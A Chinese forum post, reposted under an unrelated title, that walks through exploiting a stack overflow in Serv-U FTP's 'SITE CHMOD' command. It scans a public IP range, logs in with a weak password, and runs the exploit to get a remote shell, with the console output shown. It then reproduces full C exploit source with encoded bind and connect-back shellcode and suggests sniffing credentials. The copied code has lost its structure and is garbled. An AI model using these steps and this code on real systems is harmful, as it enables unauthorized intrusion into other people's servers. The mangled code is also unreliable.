期货交易自动化论坛

 找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
查看: 19|回复: 0

[操作系统]前些日子写的垃圾文章! - 比特币今日价格

[复制链接] |主动推送

285万

主题

285万

帖子

855万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
8553710
发表于 2022-9-11 07:25:49 | 显示全部楼层 |阅读模式
Serv-U Ftp服务器长文件名堆栈溢出漏洞 by scantime
在网上做过软件下载的人都知道,建立一个FTP下载服务器相对比较简单,
一般用WIN2000下自带的IIS就可以,但IIS在功能上好多都不尽人如意,
下面我就介绍一款功能非常强大,但使用简单的FTP服务器构建软件-Serv-U FTP Server,
让我们也来体验一下自己DIY FTP服务器的快乐!
在说明使用之前,让我先大致介绍一下Serv-U:
Serv-U 是一个可以运行于Windows95/98/2000/ME 和 Windows NT4.0下的FTP服务器程序
有了它,你的个人电脑就可以模拟为一个FTP服务器,也就是说,
你所连接的网络中的计算机用户可以访问你的个人电脑,
通过FTP协议(文件传输协议)复制、移动、删除你的电脑中的文件或文件夹,
可以做一切权限所允许的事情。
FTP协议规定了计算机之间的标准通讯方式,
使所有不同类型,不同操作系统,不同格式的电脑之间得以互换文件。
它可以用最简单的方式创建用户帐号,
并且在硬盘空间上划分一定的区域用以存放文件,
让用户以各种FTP客户端软件(如CuteFTP、WS_FTP等)上传或下载所需要的文件。
这样好的一个东东!那么一定有不少hacker在盯着拉!下面我们来介绍一个危害很大的
Serv-U的堆栈溢出漏洞,我们先来看看受影响系统:
RhinoSoft Serv-U 4.1.0.3
RhinoSoft Serv-U 4.0.0.4
RhinoSoft Serv-U 4.0.0.0
RhinoSoft Serv-U 3.0.0.20
RhinoSoft Serv-U 4.1.0.11
- Microsoft Windows XP
- Microsoft Windows NT 4.0
- Microsoft Windows ME
- Microsoft Windows 98 SE
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2003 Web Edition
- Microsoft Windows 2003 Standard Edition
- Microsoft Windows 2003 Enterprise Edition 64-bit
- Microsoft Windows 2003 Enterprise Edition
- Microsoft Windows 2003 Datacenter Edition 64-bit
- Microsoft Windows 2003 Datacenter Edition
- Microsoft Windows 2000
不受影响系统:
RhinoSoft Serv-U 5.0
漏洞描述:
Serv-U在处理“site chmod”命令的时候,如果后面文件名参数过长将导致缓冲区溢出,远程攻击者可以利用这个漏洞以Serv-进程的权限执行任意指令。
Serv-U在给不存在的文件执行chmod命令的时候,会给用户返回该文件或目录不存在的信息,这个信息字串使用类似如下的代码创建:
sprintf(dst, “%s: No such file or directory.“, filename);
变量dst的长度是256字节,如果发送超长的filename,Serv-U将崩溃。
要成功利用这个漏洞,必须要有一个Serv-U的登陆账号并且要有一个可写的目录
以上是漏洞描述!
下面是漏洞测试!
第一我们要先扫描一个21端口!并且判断他是否是Serv-U而且是否在影响版本之内!
好我们开始扫描咯!那出扫描21端口比较快的!并且同时带弱口令检测的!
我还是拿出x-scan吧!这个的报告比较好看点
那我们开始扫描了目标是202.100.130.1-202.100.130.254
把x-scan的扫描模块跟扫描参数配置好以后!抽只烟等等结果吧!
zzZZzzZZzzZZ~~~~~~~~~5分钟后!
嘿嘿出来一大帮!我们就挑其中一只吧!
X-Scan v2.3 检测报告
[扫描结果索引]: “202.100.130.3“
FTP弱口令
详细资料
[FTP弱口令]
admin/12345
插件类型: FTP
插件成员名称: FTP弱口令
插件作者: glacier
插件版本: 1.1
风险等级: 高
漏洞描述: “安全焦点“漏洞搜索引擎 “安全焦点“漏洞利用程序搜索引擎
看到扫描报告了!呵呵~~~好现在我们判断一下用户是否有可写权限
C:\ ftp 202.100.130.3
Connected to 202.100.130.3.
220 Serv-U FTP Server v4.1 for WinSock ready...
User (202.100.130.3:(none)): admin
331 User name okay, need password.
Password:
230 User logged in, proceed.
ftp ls -al
200 PORT Command successful.
150 Opening ASCII mode data connection for /bin/ls.
d--------- 1 user group 0 Jan 15 13:50 Recycled
drw-rw-rw- 1 user group 0 Jan 30 04:57 cisco
226 Transfer complete.
ftp: 127 bytes received in 0.00Seconds 127000.00Kbytes/sec.
ftp mkdir test11111111
257 “/test11111111“ directory created.
ftp ls -al
200 PORT Command successful.
150 Opening ASCII mode data connection for /bin/ls.
d--------- 1 user group 0 Jan 15 13:50 Recycled
drw-rw-rw- 1 user group 0 Jan 30 04:57 cisco
drw-rw-rw- 1 user group 0 Jan 31 13:33 test11111111
226 Transfer complete.
ftp: 196 bytes received in 0.00Seconds 196000.00Kbytes/sec.
ftp bye
221 Goodbye!
C:\
OK!下面我们就开始用代码溢出看看里!
C:\ cd tool
C:\tool Serv
Usage: Serv -i ip -t type
[-u user] [-p pass] [-d dir]
[-f ftpport] [-c cbhost] [-s shellport]
[type]:
0 0x7ffa4a1b Serv-U v3.0.0.20~v4.1.0.11 GB 2K/XP ALL
1 0x7ffa2186 Serv-U v3.0.0.20~v4.1.0.11 BG 2K/XP ALL
2 0x6dee6713 Serv-U v3.0.0.20~v4.1.0.11 KR 2K SP4
3 0x77886713 Serv-U v3.0.0.20~v4.1.0.11 EN 2K SP4
4 0x76b42a3a Serv-U v3.0.0.20~v4.1.0.11 EN XP SP1
解释一下!
-i 主机, 要攻击的主机IP
-t 类型, 0 1 2 3 4 这些类型
-u 用户 用户名字 这里也就是admin 刚刚探测到的哦!
-p 密码 密码 刚刚探测的 12345
-f 端口 默认是21
解释几个简单的参数就OK拉!那么我们开始溢出了哦!
C:\tool Serv -i 202.100.130.3 -t 0 -u admin -p 12345 -f 21
[+] Connect to 202.100.130.3:21 success.
[+] Recv: 220 Serv-U FTP Server v4.1 for WinSock ready...
[+] Send: USER admin
[+] Recv: 331 User name okay, need password.
[+] Send: PASS 12345
[+] Recv: 230 User logged in, proceed.
[+] Send: TYPE I
[+] Recv: 200 Type set to I.
[+] Send shellcode 807 bytes.
[+] If you don’t have a shell it didn’t work.
[+] Connect to shell...
[+] Exploit success! Good luck! :)
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.
C:\ ipconfig
ipconfig
Windows 2000 IP Configuration
Ethernet adapter 本地连接 2:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.0.1
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
Ethernet adapter 本地连接:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 202.100.130.3
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 202.100.130.254
OK!到这里基本就测试完成了!好以下付lion写的攻击测试代码!溢出一次将导致Serv-U停止!
#include winsock2.h
#include windows.h
#include stdio.h
#include stdlib.h
#pragma comment(lib, “ws2_32“)
// for bind shellcode
#define BIND_OFFSET 91
// for connectback shellcode
#define PORT_OFFSET 95
#define IP_OFFSET 88
#define SEH_OFFSET 0x193 //v3.0.0.20~v4.1.0.11
//#define SEH_OFFSET 0x133 // work on v3.0.0.16~v3.0.0.19, for connectback shellcode
#define MAX_LEN 2048
#define JMP_OVER “\xeb\x06\xeb\x06“
#define VERSION “1.0“
struct
DWORD dwJMP;
char *szDescription;
}targets[] =
{0x7ffa4a1b,“Serv-U v3.0.0.20~v4.1.0.11 GB 2K/XP ALL“}, //for all GB win2000 and winxp
// {0x74FD69A9,“Serv-U v3.0.0.20~v4.1.0.11 GB 2K SP3/SP4“}, //wsock32.dll jmp ebx addr
// {0x71a469ad,“Serv-U v3.0.0.20~v4.1.0.11 GB XP SP0/SP1“}, //wsock32.dll jmp ebx addr
// {0x77e45f17,“Serv-U v3.0.0.20~v4.1.0.11 GB/BG 2K SP4“}, //user32.dll jmp ebx addr
// {0x7ffa2186,“Serv-U v3.0.0.20~v4.1.0.11 BG 2K/XP ALL“}, //for all BG win2000 and winxp
// {0x6dec6713,“Serv-U v3.0.0.20~v4.1.0.11 BG 2K SP4“}, //setupapi.dll jmp ebx addr
// {0x6DEE6713,“Serv-U v3.0.0.20~v4.1.0.11 KR 2K SP4“}, //setupapi.dll jmp ebx addr
// {0x77886713,“Serv-U v3.0.0.20~v4.1.0.11 EN 2K SP4“}, //setupapi.dll jmp ebx addr
// {0x76b42a3a,“Serv-U v3.0.0.20~v4.1.0.11 EN XP SP1“},
// {0x12345678,“Serv-U v3.0.0.20~v4.1.0.11“},
},v;
unsigned char *szSend[4];
unsigned char szCommand[MAX_LEN];
char szDirectory[0x100];
// 28 bytes decode by lion, don’t change this.
unsigned char decode[]=
“\xBE\x6D\x69\x6F\x6E\x4E\xBF\x6D\x69\x30\x6E\x4F\x43\x39\x3B\x75“
“\xFB\x4B\x80\x33\x93\x39\x73\xFC\x75\xF7\xFF\xD3“;
// Shellcode start sign, use for decode, don’t change this.
unsigned char sc_start[]=
“lion“;
// Shellcode end sign, use for decode, don’t change this.
unsigned char sc_end[]=
“li0n“;
// 311 bytes bind shellcode by lion (xor with 0x93)
unsigned char sc[]=
“\x7A\x96\x92\x93\x93\xCC\xF7\x32\xA3\x93\x93\x93\x18\xD3\x9F\x18“
“\xE3\x8F\x3E\x18\xFB\x9B\x18\x64\xF9\x97\xCA\x7B\x36\x93\x93\x93“
“\x71\x6A\xFB\xA0\xA1\x93\x93\xFB\xE4\xE0\xA1\xCC\xC7\x6C\x85\x18“
“\x7B\xF9\x95\xCA\x7B\x1F\x93\x93\x93\x71\x6A\x12\x7F\x03\x92\x93“
“\x93\xC7\xFB\x92\x92\x93\x93\x6C\xC5\x83\xC3\xC3\xC3\xC3\xF9\x92“
“\xF9\x91\x6C\xC5\x87\x18\x4B\x54\x94\x91\x93\x93\xA6\xA0\x53\x1A“
“\xD4\x97\xF9\x83\xC4\xC0\x6C\xC5\x8B\xF9\x92\xC0\x6C\xC5\x8F\xC3“
“\xC3\xC0\x6C\xC5\xB3\x18\x4B\xA0\x53\xFB\xF0\xFE\xF7\x93\x1A\xF5“
“\xA3\x10\x7F\xC7\x18\x6F\xF9\x87\xCA\x1A\x97\x1C\x71\x68\x55\xD4“
“\x83\xD7\x6D\xD4\xAF\x6D\xD4\xAE\x1A\xCC\xDB\x1A\xCC\xDF\x1A\xCC“
“\xC3\x1E\xD7\xB7\x83\xC4\xC3\xC2\xC2\xC2\xF9\x92\xC2\xC2\x6C\xE5“
“\xA3\xC2\x6C\xC5\x97\x18\x5F\xF9\x6C\x6C\xA2\x6C\xC5\x9B\xC0\x6C“
“\xC5\xB7\x6C\xC5\x9F\xC2\xC5\x18\xE6\xAF\x18\xE7\xBD\xEB\x90\x66“
“\xC5\x18\xE5\xB3\x90\x66\xA0\x5A\xDA\xD2\x3E\x90\x56\xA0\x48\x9C“
“\x2D\x83\xA9\x45\xE7\x9B\x52\x58\x9E\x90\x49\xD3\x78\x62\xA8\x8C“
“\xE6\x74\xCD\x18\xCD\xB7\x90\x4E\xF5\x18\x9F\xD8\x18\xCD\x8F\x90“
“\x4E\x18\x97\x18\x90\x56\x38\xCD\xCA\x50\x7B\x65\x6D\x6C\x6C\x1D“
“\xDD\x9D\x7F\xE1\x6D\x20\x85\x3E\x4A\x96\x5D\xED\x4B\x71\xE0\x58“
“\x7E\x6F\xA8\x4A\x9A\x66\x3E\x37\x89\xE3\x54\x37\x3E\xBD\x7A\x76“
“\xDA\x15\xDA\x74\xEA\x55\xEA“;
// 294 bytes connectback shellcode by lion (xor with 0x93)
unsigned char cbsc[]=
“\x7A\x6F\x93\x93\x93\xCC\xF7\x32\xA3\x93\x93\x93\x18\xD3\x9F\x18“
“\xE3\x8F\x3E\x18\xFB\x9B\x18\x64\xF9\x97\xCA\x7B\x0F\x93\x93\x93“
“\x71\x6A\xFB\xA0\xA1\x93\x93\xFB\xE4\xE0\xA1\xCC\xC7\x6C\x85\x18“
“\x7B\xF9\x97\xCA\x7B\x10\x93\x93\x93\x71\x6A\x12\x7F\x03\x92\x93“
“\x93\xC7\xFB\x92\x92\x93\x93\x6C\xC5\x83\xC3\xC3\xC3\xC3\xF9\x92“
“\xF9\x91\x6C\xC5\x87\x18\x4B\xFB\xEC\x93\x93\x92\xFB\x91\x93\x93“
“\xA6\x18\x5F\xF9\x83\xC2\xC0\x6C\xC5\x8B\x16\x53\xE6\xD8\xA0\x53“
“\xFB\xF0\xFE\xF7\x93\x1A\xF5\xA3\x10\x7F\xC7\x18\x6F\xF9\x83\xCA“
“\x1A\x97\x1C\x71\x68\x55\xD4\x83\xD7\x6D\xD4\xAF\x6D\xD4\xAE\x1A“
“\xCC\xDB\x1A\xCC\xDF\x1A\xCC\xC3\x1E\xD7\xB7\x83\xC4\xC3\xC2\xC2“
“\xC2\xF9\x92\xC2\xC2\x6C\xE5\xA3\xC2\x6C\xC5\x97\x18\x5F\xF9\x6C“
“\x6C\xA2\x6C\xC5\x9B\xC0\x6C\xC5\x8F\x6C\xC5\x9F\xC2\xC5\x18\xE6“
“\xAF\x18\xE7\xBD\xEB\x90\x66\xC5\x18\xE5\xB3\x90\x66\xA0\x5A\xDA“
“\xD2\x3E\x90\x56\xA0\x48\x9C\x2D\x83\xA9\x45\xE7\x9B\x52\x58\x9E“
“\x90\x49\xD3\x78\x62\xA8\x8C\xE6\x74\xCD\x18\xCD\xB7\x90\x4E\xF5“
“\x18\x9F\xD8\x18\xCD\x8F\x90\x4E\x18\x97\x18\x90\x56\x38\xCD\xCA“
“\x50\x7B\x6C\x6D\x6C\x6C\x1D\xDD\x9D\x7F\xE1\x6D\x20\x85\x3E\x4A“
“\x96\x5D\xED\x4B\x71\xE0\x58\x7E\x6F\xA8\x4A\x9A\x66\x3E\x7F\x6A“
“\x39\xF3\x74\xEA\x55\xEA“;
void usage(char *p)
int i;
printf( “Usage:\t%s\t -i ip -t type \n“
“\t\t[-u user] [-p pass] [-d dir]\n“
“\t\t[-f ftpport] [-c cbhost] [-s shellport]\n\n“
“[type]:\n“ , p);
for(i=0;i sizeof(targets)/sizeof(v);i++)
printf(“\t%d\t0x%x\t%s\n“, i, targets.dwJMP, targets.szDescription);
/* ripped from TESO code and modifed by ey4s for win32 */
void shell (int sock)
int l;
char buf[512];
struct timeval time;
unsigned long ul[2];
time.tv_sec = 1;
time.tv_usec = 0;
while (1)
ul[0] = 1;
ul[1] = sock;
l = select (0, (fd_set *) ul, NULL, NULL, time);
if(l == 1)
l = recv (sock, buf, sizeof (buf), 0);
if (l = 0)
printf (“[-] Connection closed.\n“);
return;
l = write (1, buf, l);
if (l = 0)
printf (“[-] Connection closed.\n“);
return;
else
l = read (0, buf, sizeof (buf));
if (l = 0)
printf(“[-] Connection closed.\n“);
return;
l = send(sock, buf, l, 0);
if (l = 0)
printf(“[-] Connection closed.\n“);
return;
void main(int argc, char **argv)
struct sockaddr_in sa, server, client;
WSADATA wsd;
SOCKET s, s2, s3;
int iErr, ret, len;
char szRecvBuff[MAX_LEN];
int i, j, iType;
int iPort=21;
char *ip=NULL, *pUser=“ftp“, *pPass=“ftp@ftp.com“, *cbHost=NULL;
char user[128], pass[128];
BOOL bCb=FALSE, bLocal=TRUE;
unsigned short shport=53, shport2=0;
unsigned long cbip;
unsigned int timeout=5000, Reuse;
char penetrate[255],cbHost2[20];
int seh_offset;
printf( “Serv-U FTPD 3.x/4.x \“SITE CHMOD\“ remote overflow exploit V%s\r\n“
“Bug find by kkqq kkqq@0x557.org, Code By lion (lion@cnhonker.net)\r\n“
“Welcome to HUC website “
, VERSION);
seh_offset = SEH_OFFSET;
if(argc 4)
usage(argv[0]);
return;
for(i=1;i argc;i+=2)
if(strlen(argv) != 2)
usage(argv[0]);
return;
// check parameter
if(i == argc-1)
usage(argv[0]);
return;
switch(argv[1])
case ’i’:
ip=argv[i+1];
break;
case ’t’:
iType = atoi(argv[i+1]);
break;
case ’f’:
iPort=atoi(argv[i+1]);
break;
case ’p’:
pPass = argv[i+1];
break;
case ’u’:
pUser=argv[i+1];
break;
case ’c’:
cbHost=argv[i+1];
bCb=TRUE;
break;
case ’s’:
shport=atoi(argv[i+1]);
break;
case ’d’:
if(argv[i+1][0] != ’/’)
strcpy(szDirectory, “/“);
strncat(szDirectory, argv[i+1], sizeof(szDirectory)-0x20);
if(szDirectory[strlen(szDirectory)-1] != ’/’)
strcat(szDirectory, “/“);
// correct the directory len
for(j=0;j (strlen(szDirectory)-1)%8;j++)
strcat(szDirectory, “x“);
//printf(“%d:%s\r\n“, strlen(szDirectory), szDirectory);
seh_offset = seh_offset - strlen(szDirectory)+1;
break;
if((!ip) || (!user) || (!pass))
usage(argv[0]);
printf(“[-] Invalid parameter.\n“);
return;
if( (iType 0) || (iType =sizeof(targets)/sizeof(v)) )
usage(argv[0]);
printf(“[-] Invalid type.\n“);
return;
if(iPort 0 || iPort 65535 || shport 0 || shport 65535)
usage(argv[0]);
printf(“[-] Invalid port.\n“);
return;
_snprintf(user, sizeof(user)-1, “USER %s\r\n“, pUser);
user[sizeof(user)-1]=’\0’;
_snprintf(pass, sizeof(pass)-1, “PASS %s\r\n“, pPass);
pass[sizeof(pass)-1]=’\0’;
szSend[0] = user; //user
szSend[1] = pass; //pass
szSend[2] = penetrate; //pentrate
szSend[3] = szCommand; //shellcode
// Penetrate through the firewall.
if(bCb shport 1024)
strncpy(cbHost2, cbHost, 20);
for(i=0;i strlen(cbHost); i++)
if(cbHost == ’.’)
cbHost2 = ’,’;
sprintf(penetrate, “PORT %s,%d,%d\r\n“, cbHost2, shport/256, shport%256);
//printf(“%s“, penetrate);
else
sprintf(penetrate,“TYPE I\r\n“);
// fill the “site chmod“ command
strcpy(szCommand, “site chmod 777 “);
// fill the directory
if(szDirectory[0])
strcat(szCommand, szDirectory);
// fill the egg
for(i=0;i seh_offset%8;i++)
strcat(szCommand, “\x90“);
//strcat(szCommand, “BBBB“);
// fill the seh
for(i=0;i =(seh_offset/8)*8+0x20;i+=8)
strcat(szCommand, JMP_OVER);
memcpy( szCommand[strlen(szCommand)], targets[iType].dwJMP, 4);
// fill the decode
strcat(szCommand, decode);
// fill the shellcode start sign
strcat(szCommand, sc_start);
// fill the shellcode
if(bCb)
// connectback shellcode
shport2 = htons(shport)^(u_short)0x9393;
cbip = inet_addr(cbHost)^0x93939393;
memcpy( cbsc[PORT_OFFSET], shport2, 2);
memcpy( cbsc[IP_OFFSET], cbip, 4);
strcat(szCommand, cbsc);
else
// bind shellcode
shport2 = htons(shport)^(u_short)0x9393;
memcpy( sc[BIND_OFFSET], shport2, 2);
strcat(szCommand, sc);
// fill the shellcode end sign
strcat(szCommand, sc_end);
// send end
strcat(szCommand, “\r\n“);
if(strlen(szCommand) = sizeof(szCommand))
printf(“[-] stack buffer overflow.\n“);
return;
// printf(“send size %d:%s“, strlen(szCommand), szCommand);
__try
if (WSAStartup(MAKEWORD(1,1), wsd) != 0)
printf(“[-] WSAStartup error:%d\n“, WSAGetLastError());
__leave;
s=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(s == INVALID_SOCKET)
printf(“[-] Create socket failed:%d“,GetLastError());
__leave;
sa.sin_family=AF_INET;
sa.sin_port=htons((USHORT)iPort);
sa.sin_addr.S_un.S_addr=inet_addr(ip);
setsockopt(s,SOL_SOCKET,SO_RCVTIMEO,(char *) timeout,sizeof(unsigned int));
iErr = connect(s,(struct sockaddr *) sa,sizeof(sa));
if(iErr == SOCKET_ERROR)
printf(“[-] Connect to %s:%d error:%d\n“, ip, iPort, GetLastError());
__leave;
printf(“[+] Connect to %s:%d success.\n“, ip, iPort);
if(bCb)
Sleep(500);
s2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
server.sin_family=AF_INET;
server.sin_addr.S_un.S_addr=inet_addr(cbHost);
//server.sin_addr.s_addr=INADDR_ANY;
server.sin_port=htons((unsigned short)shport);
setsockopt(s2,SOL_SOCKET,SO_RCVTIMEO,(char *) timeout,sizeof(unsigned int));
Reuse = 1;
setsockopt(s2, SOL_SOCKET, SO_REUSEADDR, (char*) Reuse, sizeof(Reuse));
if(bind(s2,(LPSOCKADDR) server,sizeof(server))==SOCKET_ERROR)
printf(“[-] Bind port on %s:%d error.\n“, cbHost, shport);
printf(“[-] You must run nc get the shell.\n“);
bLocal = FALSE;
//closesocket(s2);
//__leave;
else
printf(“[+] Bind port on %s:%d success.\n“, cbHost, shport);
listen(s2, 1);
for(i=0;i sizeof(szSend)/sizeof(szSend[0]);i++)
memset(szRecvBuff, 0, sizeof(szRecvBuff));
iErr = recv(s, szRecvBuff, sizeof(szRecvBuff), 0);
if(iErr == SOCKET_ERROR)
printf(“[-] Recv buffer error:%d.\n“, WSAGetLastError());
__leave;
printf(“[+] Recv: %s“, szRecvBuff);
if(szRecvBuff[0] == ’5’)
printf(“[-] Server return a error Message.\r\n“);
__leave;
iErr = send(s, szSend, strlen(szSend),0);
if(iErr == SOCKET_ERROR)
printf(“[-] Send buffer error:%d.\n“, WSAGetLastError());
__leave;
if(i==sizeof(szSend)/sizeof(szSend[0])-1)
printf(“[+] Send shellcode %d bytes.\n“, iErr);
else
printf(“[+] Send: %s“, szSend);
printf(“[+] If you don’t have a shell it didn’t work.\n“);
if(bCb)
if(bLocal)
printf(“[+] Wait for shell...\n“);
len = sizeof(client);
s3 = accept(s2, (struct sockaddr*) client, len);
if(s3 != INVALID_SOCKET)
printf(“[+] Exploit success! Good luck! :)\n“);
printf(“[+] ===--===--===--===--===--===--===--===--===--===--===--===--===--===\n“);
shell(s3);
else
printf(“[+] Connect to shell...\n“);
Sleep(1000);
s2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
server.sin_family = AF_INET;
server.sin_port = htons(shport);
server.sin_addr.s_addr=inet_addr(ip);
ret = connect(s2, (struct sockaddr *) server, sizeof(server));
if(ret!=0)
printf(“[-] Exploit seem failed.\n“);
__leave;
printf(“[+] Exploit success! Good luck! :)\n“);
printf(“[+] ===--===--===--===--===--===--===--===--===--===--===--===--===--===\n“);
shell(s2);
__finally
if(s != INVALID_SOCKET) closesocket(s);
if(s2 != INVALID_SOCKET) closesocket(s2);
if(s3 != INVALID_SOCKET) closesocket(s3);
WSACleanup();
return;
ps:如果针对的是某个下栽站点!你可以通过探嗅抓取数据包!
找出对应的用户密码! 当然你也可以利用其他的办法获取!
现在攻击程序已经不需要写的权限了!呵呵~~~~
sol下载

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|手机版|小黑屋|期货交易自动化论坛

GMT+8, 2024-11-25 20:21 , Processed in 0.115906 second(s), 28 queries .

Powered by Discuz! X3.4

© 2001-2017 Comsenz Inc.

快速回复 返回顶部 返回列表